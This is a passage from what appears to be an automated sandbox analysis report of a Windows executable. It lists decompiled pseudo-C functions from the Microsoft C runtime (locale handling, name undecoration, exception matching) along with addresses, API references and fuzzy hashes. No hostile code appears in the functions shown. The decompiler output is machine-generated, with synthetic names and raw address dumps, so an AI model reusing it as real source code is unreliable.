                  				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                  				if(_t23 == 0) {
                  					_t23 = E00406EAE(_t44);
                  				}
                  				 *(_t46 - 0x1c) = _t23;
                  				_t45 =  *((intOrPtr*)(_t46 + 8));
                  				 *((intOrPtr*)(_t45 + 0x5c)) = 0x47b990;
                  				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                  				if(_t23 != 0) {
                  					_t35 = GetProcAddress;
                  					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                  					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                  				}
                  				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                  				 *((char*)(_t45 + 0xc8)) = 0x43;
                  				 *((char*)(_t45 + 0x14b)) = 0x43;
                  				 *(_t45 + 0x68) = 0x44f740;
                  				E0040CFC1(_t35, 0xd);
                  				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                  				InterlockedIncrement( *(_t45 + 0x68));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				E004068C4();
                  				E0040CFC1(_t35, 0xc);
                  				 *(_t46 - 4) = 1;
                  				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                  				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                  				if(_t28 == 0) {
                  					_t32 =  *0x44fd48; // 0x44fc70
                  					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                  				}
                  				E0040EC63( *((intOrPtr*)(_t45 + 0x6c)));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				return E00404209(E004068CD());
                  			}








                  0x004067ef
                  0x004067ef
                  0x004067f1
                  0x004067f6
                  0x004067fb
                  0x00406801
                  0x00406809
                  0x0040680c
                  0x00406811
                  0x00406812
                  0x00406815
                  0x00406818
                  0x00406822
                  0x00406827
                  0x0040682f
                  0x00406837
                  0x00406847
                  0x00406847
                  0x0040684d
                  0x00406850
                  0x00406857
                  0x0040685e
                  0x00406867
                  0x0040686d
                  0x00406874
                  0x0040687a
                  0x00406881
                  0x00406888
                  0x0040688e
                  0x00406891
                  0x00406894
                  0x00406899
                  0x0040689b
                  0x004068a0
                  0x004068a0
                  0x004068a6
                  0x004068ac
                  0x004068bd

                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0047DF70,0000000C,0040692A,00000000,00000000,?,?,00403B83,00403E57,00000001,?,004021D5,00000001,?), ref: 00406801
                  • __crt_waiting_on_module_handle.LIBCMT ref: 0040680C
                    • Part of subcall function 00406EAE: Sleep.KERNEL32(000003E8,?,?,00406715,KERNEL32.DLL,?,0040AD43,?,00403E51,?,00000001,?,004021D5,00000001,?), ref: 00406EBA
                    • Part of subcall function 00406EAE: GetModuleHandleW.KERNEL32(?,?,?,00406715,KERNEL32.DLL,?,0040AD43,?,00403E51,?,00000001,?,004021D5,00000001,?), ref: 00406EC3
                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406835
                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00406845
                  • __lock.LIBCMT ref: 00406867
                  • InterlockedIncrement.KERNEL32(0044F740), ref: 00406874
                  • __lock.LIBCMT ref: 00406888
                  • ___addlocaleref.LIBCMT ref: 004068A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                  • API String ID: 1028249917-2843748187
                  • Opcode ID: 6879677060a77e580d54f26ccf6d057929c4ce4625cc49d0746581c69afff43e
                  • Instruction ID: 4f57d67a29214185a11142792774fa2e3b781a15360e02eb98be558adc42a254
                  • Opcode Fuzzy Hash: 6879677060a77e580d54f26ccf6d057929c4ce4625cc49d0746581c69afff43e
                  • Instruction Fuzzy Hash: E511A2B2901701DAD710AF76D845B9ABBE0EF44314F10853FE4AAA62D1CB789985CB9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041B24E(intOrPtr _a4, intOrPtr* _a8) {
                  				signed int _v8;
                  				char _v12;
                  				signed int _v16;
                  				char _v20;
                  				char _v28;
                  				void* __esi;
                  				char _t31;
                  				void* _t34;
                  				intOrPtr _t35;
                  				char _t37;
                  				void* _t38;
                  				void* _t40;
                  				void* _t48;
                  				char* _t64;
                  				char* _t66;
                  				void* _t70;
                  				intOrPtr* _t71;
                  
                  				_t64 =  *0x451258; // 0x0
                  				_v8 = _v8 & 0xffff0000;
                  				_t31 =  *_t64;
                  				_v12 = 0;
                  				if(_t31 == 0) {
                  					L19:
                  					E004177E3(0xffff0000, _a4, 1, _a8);
                  					L20:
                  					L21:
                  					return _a4;
                  				}
                  				_t34 = _t31 - 0x24;
                  				if(_t34 == 0) {
                  					_t35 =  *((intOrPtr*)(_t64 + 1));
                  					if(_t35 == 0x24) {
                  						_t66 = _t64 + 2;
                  						 *0x451258 = _t66;
                  						_t37 =  *_t66;
                  						if(_t37 == 0) {
                  							goto L19;
                  						}
                  						_t38 = _t37 - 0x41;
                  						if(_t38 == 0) {
                  							 *0x451258 = _t66 + 1;
                  							E0041A2C7(_t66 + 1, _a4, _a8);
                  							L5:
                  							goto L21;
                  						}
                  						_t40 = _t38 - 1;
                  						if(_t40 == 0) {
                  							 *0x451258 = _t66 + 1;
                  							E00418444(_t66 + 1, _t70, _a4, _a8, 1);
                  							goto L20;
                  						}
                  						if(_t40 != 1) {
                  							L11:
                  							E00416DBC(_a4, 2);
                  							goto L21;
                  						}
                  						_v8 = _v8 & 0xffff0000;
                  						 *0x451258 = _t66 + 1;
                  						_v12 = 0;
                  						E0041AE97(0xffff0000, _t66 + 1, _a4, E0041A61B( &_v28, _a8, 0,  &_v12, 0));
                  						goto L21;
                  					}
                  					if(_t35 == 0) {
                  						goto L19;
                  					}
                  					goto L11;
                  				}
                  				_t48 = _t34 - 0x1d;
                  				_t71 = _a8;
                  				if(_t48 == 0) {
                  					L8:
                  					 *0x451258 =  *0x451258 + 1;
                  					_v20 =  *_t71;
                  					_v16 =  *(_t71 + 4) | 0x00000100;
                  					E0041AD46(_a4,  &_v12,  &_v20);
                  					goto L20;
                  				}
                  				if(_t48 == 1) {
                  					E00417453( &_v12, "volatile");
                  					if( *_t71 != 0) {
                  						E004175B3( &_v12, 0x20);
                  					}
                  					goto L8;
                  				}
                  				E0041AE97(0xffff0000, _t64, _a4, _t71);
                  				goto L5;
                  			}




















                  0x0041b256
                  0x0041b267
                  0x0041b26a
                  0x0041b26d
                  0x0041b270
                  0x0041b36f
                  0x0041b377
                  0x0041b37c
                  0x0041b37f
                  0x0041b385
                  0x0041b385
                  0x0041b276
                  0x0041b279
                  0x0041b2dd
                  0x0041b2e2
                  0x0041b2fc
                  0x0041b2fd
                  0x0041b306
                  0x0041b308
                  0x00000000
                  0x00000000
                  0x0041b30a
                  0x0041b30d
                  0x0041b35f
                  0x0041b365
                  0x0041b28f
                  0x00000000
                  0x0041b290
                  0x0041b30f
                  0x0041b310
                  0x0041b34b
                  0x0041b351
                  0x00000000
                  0x0041b351
                  0x0041b313
                  0x0041b2ec
                  0x0041b2f1
                  0x00000000
                  0x0041b2f1
                  0x0041b315
                  0x0041b326
                  0x0041b32c
                  0x0041b338
                  0x00000000
                  0x0041b33d
                  0x0041b2e6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0041b2e6
                  0x0041b27b
                  0x0041b27e
                  0x0041b281
                  0x0041b2b1
                  0x0041b2b6
                  0x0041b2bc
                  0x0041b2d0
                  0x0041b2d3
                  0x00000000
                  0x0041b2d3
                  0x0041b284
                  0x0041b29e
                  0x0041b2a5
                  0x0041b2ac
                  0x0041b2ac
                  0x00000000
                  0x0041b2a5
                  0x0041b28a
                  0x00000000

                  APIs
                  • UnDecorator::getBasicDataType.LIBCMT ref: 0041B28A
                  • DName::operator=.LIBCMT ref: 0041B29E
                  • DName::operator+=.LIBCMT ref: 0041B2AC
                  • UnDecorator::getReferenceType.LIBCMT ref: 0041B2D3
                  • DName::DName.LIBCMT ref: 0041B2F1
                  • UnDecorator::getDataIndirectType.LIBCMT ref: 0041B32F
                  • UnDecorator::getBasicDataType.LIBCMT ref: 0041B338
                  • operator+.LIBCMT ref: 0041B377
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Decorator::getType$Data$Basic$IndirectNameName::Name::operator+=Name::operator=Referenceoperator+
                  • String ID: volatile
                  • API String ID: 2092030914-4266433718
                  • Opcode ID: 6f3c57807fac93feab1c77a3dfc6992bba71baf33062bcba5b6727b3a5bba0d6
                  • Instruction ID: 3042dc26837de7a3af4c02202fe795b733d343c523731ee85f887a3b0b9639e7
                  • Opcode Fuzzy Hash: 6f3c57807fac93feab1c77a3dfc6992bba71baf33062bcba5b6727b3a5bba0d6
                  • Instruction Fuzzy Hash: 5531D031800248ABCB11AF65CC819FE7F79FB44300F10806BF855AA261D7398AD58B89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0040C422(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
                  				signed int _v16;
                  				signed int _v20;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int* _t28;
                  				void* _t29;
                  				signed int* _t31;
                  				void* _t33;
                  				intOrPtr _t34;
                  				intOrPtr _t36;
                  				signed int* _t38;
                  				signed int _t41;
                  				signed int _t49;
                  				signed int _t52;
                  				void* _t53;
                  				signed int _t55;
                  				signed int _t57;
                  				signed int _t59;
                  				void* _t61;
                  				void* _t62;
                  
                  				_t28 = _a4;
                  				_t62 = _t61 - 0x10;
                  				if(_t28 != 0) {
                  					_t49 = _a12;
                  					_t59 =  *_t28;
                  					_t55 = _a8;
                  					__eflags = _t55;
                  					if(_t55 == 0) {
                  						L4:
                  						_t29 =  *_t59;
                  						__eflags = _t29 - 0xe0434f4d;
                  						if(_t29 == 0xe0434f4d) {
                  							L21:
                  							__eflags = _t29 - 0xe06d7363;
                  							if(__eflags != 0) {
                  								L29:
                  								_t31 = E0040694F(_t49, _t53, _t55, __eflags) + 0x90;
                  								 *_t31 =  *_t31 + 1;
                  								__eflags =  *_t31;
                  								goto L30;
                  							} else {
                  								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
                  								if(__eflags != 0) {
                  									goto L29;
                  								} else {
                  									_t34 =  *((intOrPtr*)(_t59 + 0x14));
                  									__eflags = _t34 - 0x19930520;
                  									if(_t34 == 0x19930520) {
                  										L26:
                  										__eflags =  *(_t59 + 0x1c);
                  										if(__eflags != 0) {
                  											goto L29;
                  										} else {
                  											__eflags =  *(E0040694F(_t49, _t53, _t55, __eflags) + 0x88);
                  											if(__eflags != 0) {
                  												goto L29;
                  											} else {
                  												goto L28;
                  											}
                  										}
                  									} else {
                  										__eflags = _t34 - 0x19930521;
                  										if(_t34 == 0x19930521) {
                  											goto L26;
                  										} else {
                  											__eflags = _t34 - 0x19930522;
                  											if(__eflags != 0) {
                  												goto L29;
                  											} else {
                  												goto L26;
                  											}
                  										}
                  									}
                  								}
                  							}
                  						} else {
                  							__eflags = _t49 & 0x00000040;
                  							if((_t49 & 0x00000040) == 0) {
                  								goto L21;
                  							} else {
                  								goto L6;
                  							}
                  						}
                  					} else {
                  						__eflags =  *((char*)(_t55 + 8));
                  						if( *((char*)(_t55 + 8)) != 0) {
                  							L6:
                  							__eflags =  *_t59 - 0xe06d7363;
                  							if( *_t59 != 0xe06d7363) {
                  								L28:
                  								_t33 = 0;
                  							} else {
                  								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
                  								if( *((intOrPtr*)(_t59 + 0x10)) != 3) {
                  									goto L28;
                  								} else {
                  									_t36 =  *((intOrPtr*)(_t59 + 0x14));
                  									__eflags = _t36 - 0x19930520;
                  									if(_t36 == 0x19930520) {
                  										L11:
                  										__eflags =  *(_t59 + 0x1c);
                  										if(__eflags != 0) {
                  											L14:
                  											_t38 =  *( *(_t59 + 0x1c) + 0xc);
                  											_v16 = _t55;
                  											_t57 =  *_t38;
                  											_v20 = _t49 | 0x80000000;
                  											_t52 =  &(_t38[1]);
                  											while(1) {
                  												__eflags = _t57;
                  												if(_t57 <= 0) {
                  													break;
                  												}
                  												_a4 =  *_t52;
                  												_t41 = E0040B97C( &_v20,  *_t52,  *(_t59 + 0x1c));
                  												_t62 = _t62 + 0xc;
                  												__eflags = _t41;
                  												if(__eflags != 0) {
                  													 *((intOrPtr*)(E0040694F(_t52, _t53, _t57, __eflags) + 0x90)) =  *((intOrPtr*)(E0040694F(_t52, _t53, _t57, __eflags) + 0x90)) + 1;
                  													__eflags = _a16;
                  													if(__eflags != 0) {
                  														_push(_a4);
                  														_push( &_v20);
                  														_push(_a16);
                  														_push(_t59);
                  														E0040C390(_t52, _t57, _t59, __eflags);
                  													}
                  													L30:
                  													_t33 = 1;
                  													__eflags = 1;
                  												} else {
                  													_t57 = _t57 - 1;
                  													_t52 = _t52 + 4;
                  													__eflags = _t52;
                  													continue;
                  												}
                  												goto L31;
                  											}
                  											goto L28;
                  										} else {
                  											__eflags =  *(E0040694F(_t49, _t53, _t55, __eflags) + 0x88);
                  											if(__eflags == 0) {
                  												goto L28;
                  											} else {
                  												_t59 =  *(E0040694F(_t49, _t53, _t55, __eflags) + 0x88);
                  												goto L14;
                  											}
                  										}
                  									} else {
                  										__eflags = _t36 - 0x19930521;
                  										if(_t36 == 0x19930521) {
                  											goto L11;
                  										} else {
                  											__eflags = _t36 - 0x19930522;
                  											if(_t36 != 0x19930522) {
                  												goto L28;
                  											} else {
                  												goto L11;
                  											}
                  										}
                  									}
                  								}
                  							}
                  						} else {
                  							goto L4;
                  						}
                  					}
                  					L31:
                  					return _t33;
                  				} else {
                  					return _t28;
                  				}
                  			}

























                  0x0040c427
                  0x0040c42a
                  0x0040c42f
                  0x0040c434
                  0x0040c438
                  0x0040c43b
                  0x0040c43e
                  0x0040c440
                  0x0040c448
                  0x0040c448
                  0x0040c44a
                  0x0040c44f
                  0x0040c516
                  0x0040c516
                  0x0040c51b
                  0x0040c553
                  0x0040c558
                  0x0040c55d
                  0x0040c55d
                  0x00000000
                  0x0040c51d
                  0x0040c51d
                  0x0040c521
                  0x00000000
                  0x0040c523
                  0x0040c523
                  0x0040c526
                  0x0040c52b
                  0x0040c53b
                  0x0040c53b
                  0x0040c53f
                  0x00000000
                  0x0040c541
                  0x0040c546
                  0x0040c54d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040c54d
                  0x0040c52d
                  0x0040c52d
                  0x0040c532
                  0x00000000
                  0x0040c534
                  0x0040c534
                  0x0040c539
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040c539
                  0x0040c532
                  0x0040c52b
                  0x0040c521
                  0x0040c455
                  0x0040c455
                  0x0040c458
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040c458
                  0x0040c442
                  0x0040c442
                  0x0040c446
                  0x0040c45e
                  0x0040c45e
                  0x0040c464
                  0x0040c54f
                  0x0040c54f
                  0x0040c46a
                  0x0040c46a
                  0x0040c46e
                  0x00000000
                  0x0040c474
                  0x0040c474
                  0x0040c477
                  0x0040c47c
                  0x0040c490
                  0x0040c490
                  0x0040c494
                  0x0040c4b3
                  0x0040c4b6
                  0x0040c4bf
                  0x0040c4c2
                  0x0040c4c4
                  0x0040c4c7
                  0x0040c4e9
                  0x0040c4e9
                  0x0040c4eb
                  0x00000000
                  0x00000000
                  0x0040c4d1
                  0x0040c4d9
                  0x0040c4de
                  0x0040c4e1
                  0x0040c4e3
                  0x0040c4f9
                  0x0040c4fb
                  0x0040c4ff
                  0x0040c501
                  0x0040c507
                  0x0040c508
                  0x0040c50b
                  0x0040c50c
                  0x0040c511
                  0x0040c55f
                  0x0040c561
                  0x0040c561
                  0x0040c4e5
                  0x0040c4e5
                  0x0040c4e6
                  0x0040c4e6
                  0x00000000
                  0x0040c4e6
                  0x00000000
                  0x0040c4e3
                  0x00000000
                  0x0040c496
                  0x0040c49b
                  0x0040c4a2
                  0x00000000
                  0x0040c4a8
                  0x0040c4ad
                  0x00000000
                  0x0040c4ad
                  0x0040c4a2
                  0x0040c47e
                  0x0040c47e
                  0x0040c483
                  0x00000000
                  0x0040c485
                  0x0040c485
                  0x0040c48a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040c48a
                  0x0040c483
                  0x0040c47c
                  0x0040c46e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040c446
                  0x0040c562
                  0x0040c566
                  0x0040c432
                  0x0040c432
                  0x0040c432

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __getptd
                  • String ID: MOC$csm$csm
                  • API String ID: 3384420010-2232927589
                  • Opcode ID: d60b8c64551a185b3ee984531602dc0423b384d77b570c3187fe3721b462a42a
                  • Instruction ID: 226bc9c285bf93f691323d83c4ce9491f08c873763805d48f6b67b2c9be1fa49
                  • Opcode Fuzzy Hash: d60b8c64551a185b3ee984531602dc0423b384d77b570c3187fe3721b462a42a
                  • Instruction Fuzzy Hash: 8F31EE75400211EFDF309F69C8D0B6A73A8FB50318F59463BD849E7392D738E9458A8A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041920C(void* __edx, void* __eflags, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				char _v12;
                  				char _v20;
                  				char* _t15;
                  				intOrPtr* _t18;
                  				void* _t21;
                  				void* _t24;
                  				void* _t41;
                  
                  				_t41 = __edx;
                  				E00417184( &_v12, E00416815(0));
                  				_t15 =  *0x451258; // 0x0
                  				if( *_t15 == 0) {
                  					E00417099( &_v12, 1);
                  					goto L8;
                  				} else {
                  					 *0x451258 = _t15 + 1;
                  					_t21 =  *_t15 - 0x30;
                  					if(_t21 == 0) {
                  						E00417605( &_v12, "void");
                  						goto L8;
                  					} else {
                  						_t24 = _t21;
                  						if(_t24 == 0) {
                  							E004173A9( &_v12, E00418FD7(_t41, __eflags,  &_v20));
                  							goto L8;
                  						} else {
                  							if(_t24 != 3) {
                  								L8:
                  								E00417605( &_v12, ") ");
                  								_t18 = _a4;
                  								 *_t18 = _v12;
                  								 *((intOrPtr*)(_t18 + 4)) = _v8;
                  								return _t18;
                  							} else {
                  								E00416DBC(_a4, 2);
                  								return _a4;
                  							}
                  						}
                  					}
                  				}
                  			}











                  0x0041920c
                  0x00419222
                  0x00419227
                  0x0041922f
                  0x00419282
                  0x00000000
                  0x00419231
                  0x00419235
                  0x0041923c
                  0x0041923f
                  0x00419276
                  0x00000000
                  0x00419241
                  0x00419242
                  0x00419243
                  0x00419267
                  0x00000000
                  0x00419245
                  0x00419248
                  0x00419287
                  0x0041928f
                  0x00419297
                  0x0041929a
                  0x0041929f
                  0x004192a3
                  0x0041924a
                  0x0041924f
                  0x00419258
                  0x00419258
                  0x00419248
                  0x00419243
                  0x0041923f

                  APIs
                  • UnDecorator::UScore.LIBCMT ref: 00419216
                  • DName::DName.LIBCMT ref: 00419222
                    • Part of subcall function 00417184: DName::doPchar.LIBCMT ref: 004171B1
                  • DName::DName.LIBCMT ref: 0041924F
                    • Part of subcall function 00416DBC: DNameStatusNode::make.LIBCMT ref: 00416DEA
                  • UnDecorator::getScopedName.LIBCMT ref: 0041925D
                  • DName::operator+=.LIBCMT ref: 00419267
                  • DName::operator+=.LIBCMT ref: 00419276
                  • DName::operator+=.LIBCMT ref: 00419282
                  • DName::operator+=.LIBCMT ref: 0041928F
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: NameName::operator+=$Name::$Decorator::Decorator::getName::doNode::makePcharScopedScoreStatus
                  • String ID: void
                  • API String ID: 2229739886-3531332078
                  • Opcode ID: 761812697dd23d617cca77f0d28cd9283ad3b946e7d4a8382082615a309bf7d3
                  • Instruction ID: f04134253eab2b0cddc6e7ff179a23c7d0877e382353d3a3029f6b8c55af4ac1
                  • Opcode Fuzzy Hash: 761812697dd23d617cca77f0d28cd9283ad3b946e7d4a8382082615a309bf7d3
                  • Instruction Fuzzy Hash: BB118670504148BBCB08EB65C856EED7BB49B40304F00009EE4169B2A2DB789EC5C749
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0040FB44(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t13;
                  				intOrPtr _t14;
                  				intOrPtr _t17;
                  				void* _t43;
                  				intOrPtr* _t51;
                  
                  				if(_a4 > 5 || _a8 == 0) {
                  					L4:
                  					return 0;
                  				} else {
                  					_t51 = E00406D1F(8, 1);
                  					_t57 = _t51;
                  					if(_t51 != 0) {
                  						_t13 = E00406D1F(0xd8, 1);
                  						 *_t51 = _t13;
                  						__eflags = _t13;
                  						if(__eflags != 0) {
                  							_t14 = E00406D1F(0x220, 1);
                  							 *((intOrPtr*)(_t51 + 4)) = _t14;
                  							__eflags = _t14;
                  							if(__eflags != 0) {
                  								E0040ED8B( *_t51, 0x44fc70);
                  								_t48 =  *_t51;
                  								_t17 = E0040F929(_a8,  *_t51, _a4);
                  								_pop(_t43);
                  								__eflags = _t17;
                  								if(__eflags != 0) {
                  									__eflags = E0040E733(_t43, _t48, __eflags,  *((intOrPtr*)( *_t51 + 4)),  *((intOrPtr*)(_t51 + 4)));
                  									if(__eflags == 0) {
                  										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
                  										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
                  										L17:
                  										return _t51;
                  									}
                  									_push( *((intOrPtr*)(_t51 + 4)));
                  									E00403E62(__ebx, 1, _t51, __eflags);
                  									E0040ECF2( *_t51);
                  									E0040EB1A( *_t51);
                  									_push(_t51);
                  									E00403E62(__ebx, 1, _t51, __eflags);
                  									L15:
                  									_t51 = 0;
                  									goto L17;
                  								}
                  								E0040ECF2( *_t51);
                  								E0040EB1A( *_t51);
                  								_push(_t51);
                  								E00403E62(__ebx, 1, _t51, __eflags);
                  								goto L15;
                  							}
                  							_push( *_t51);
                  							E00403E62(__ebx, 1, _t51, __eflags);
                  							_push(_t51);
                  							E00403E62(__ebx, 1, _t51, __eflags);
                  							L8:
                  							goto L3;
                  						}
                  						_push(_t51);
                  						E00403E62(__ebx, 1, _t51, __eflags);
                  						goto L8;
                  					}
                  					L3:
                  					 *((intOrPtr*)(E00403B7E(_t57))) = 0xc;
                  					goto L4;
                  				}
                  			}











                  0x0040fb4f
                  0x0040fb75
                  0x00000000
                  0x0040fb57
                  0x0040fb62
                  0x0040fb66
                  0x0040fb68
                  0x0040fb81
                  0x0040fb88
                  0x0040fb8a
                  0x0040fb8c
                  0x0040fb9d
                  0x0040fba4
                  0x0040fba7
                  0x0040fba9
                  0x0040fbc2
                  0x0040fbcd
                  0x0040fbcf
                  0x0040fbd4
                  0x0040fbd5
                  0x0040fbd7
                  0x0040fc01
                  0x0040fc03
                  0x0040fc2b
                  0x0040fc30
                  0x0040fc32
                  0x00000000
                  0x0040fc32
                  0x0040fc05
                  0x0040fc08
                  0x0040fc0f
                  0x0040fc16
                  0x0040fc1b
                  0x0040fc1c
                  0x0040fc24
                  0x0040fc24
                  0x00000000
                  0x0040fc24
                  0x0040fbdb
                  0x0040fbe2
                  0x0040fbe7
                  0x0040fbe8
                  0x00000000
                  0x0040fbed
                  0x0040fbab
                  0x0040fbad
                  0x0040fbb2
                  0x0040fbb3
                  0x0040fb94
                  0x00000000
                  0x0040fb94
                  0x0040fb8e
                  0x0040fb8f
                  0x00000000
                  0x0040fb8f
                  0x0040fb6a
                  0x0040fb6f
                  0x00000000
                  0x0040fb6f

                  APIs
                  • __calloc_crt.LIBCMT ref: 0040FB5D
                    • Part of subcall function 00406D1F: __calloc_impl.LIBCMT ref: 00406D30
                    • Part of subcall function 00406D1F: Sleep.KERNEL32(00000000), ref: 00406D47
                  • __calloc_crt.LIBCMT ref: 0040FB81
                  • __calloc_crt.LIBCMT ref: 0040FB9D
                  • __copytlocinfo_nolock.LIBCMT ref: 0040FBC2
                  • __setlocale_nolock.LIBCMT ref: 0040FBCF
                  • ___removelocaleref.LIBCMT ref: 0040FBDB
                  • ___freetlocinfo.LIBCMT ref: 0040FBE2
                  • __setmbcp_nolock.LIBCMT ref: 0040FBFA
                  • ___removelocaleref.LIBCMT ref: 0040FC0F
                  • ___freetlocinfo.LIBCMT ref: 0040FC16
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp Download File
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                  • String ID:
                  • API String ID: 2969281212-0
                  • Opcode ID: c606d435dd84eb745c899e385ea71ef8a2edec459b89501ec37840d0ec171848
                  • Instruction ID: e89a778a04b0ec4ad81ea79935b569be5ffe93e0e2d6256a2857fdcf3fb35382
                  • Opcode Fuzzy Hash: c606d435dd84eb745c899e385ea71ef8a2edec459b89501ec37840d0ec171848
                  • Instruction Fuzzy Hash: BB21E431104601EAEB316F2AD812D0B7BF8EF80754B20883FF885766E1DE3DAC148A5D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0040201E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _v16;
                  				intOrPtr _v36;
                  				char _v52;
                  				char _v92;
                  				intOrPtr* _t34;
                  				intOrPtr* _t37;
                  
                  				_push(0x44);
                  				E00403401(E0044EBD8, __ebx, __edi, __esi);
                  				E00401230( &_v52, "invalid string position");
                  				_v16 = _v16 & 0x00000000;
                  				E00401F97( &_v92,  &_v52);
                  				E00402FB0( &_v92, 0x47de0c);
                  				asm("int3");
                  				_push(0x44);
                  				E00403401(E0044EBD8, __ebx, __edi, __esi);
                  				E00401230( &_v52, "invalid string argument");
                  				_v16 = _v16 & 0x00000000;
                  				_t34 =  &_v92;
                  				E00401F48(_t34,  &_v52);
                  				E00402FB0( &_v92, 0x47de48);
                  				asm("int3");
                  				_push(__esi);
                  				_t37 = _t34;
                  				E004011C0(_v36);
                  				 *_t37 = 0x47b23c;
                  				return _t37;
                  			}









                  0x0040201e
                  0x00402025
                  0x00402032
                  0x00402037
                  0x00402042
                  0x00402050
                  0x00402055
                  0x00402056
                  0x0040205d
                  0x0040206a
                  0x0040206f
                  0x00402077
                  0x0040207a
                  0x00402088
                  0x0040208d
                  0x00402093
                  0x00402097
                  0x00402099
                  0x0040209e
                  0x004020a8

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00402025
                    • Part of subcall function 00401230: _strlen.LIBCMT ref: 0040124A
                  • std::bad_exception::bad_exception.LIBCMT ref: 00402042
                  • __CxxThrowException@8.LIBCMT ref: 00402050
                    • Part of subcall function 00402FB0: RaiseException.KERNEL32(?,?,00402DB8,?,?,?,?,?,00402DB8,?,0047E950,004507A0,?,?,?), ref: 00402FF2
                  • __EH_prolog3.LIBCMT ref: 0040205D
                  • std::bad_exception::bad_exception.LIBCMT ref: 0040207A
                  • __CxxThrowException@8.LIBCMT ref: 00402088
                    • Part of subcall function 004011C0: std::exception::exception.LIBCMT ref: 004011EE
                  Strings
                  • invalid string position, xrefs: 0040202A
                  • invalid string argument, xrefs: 00402062
                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
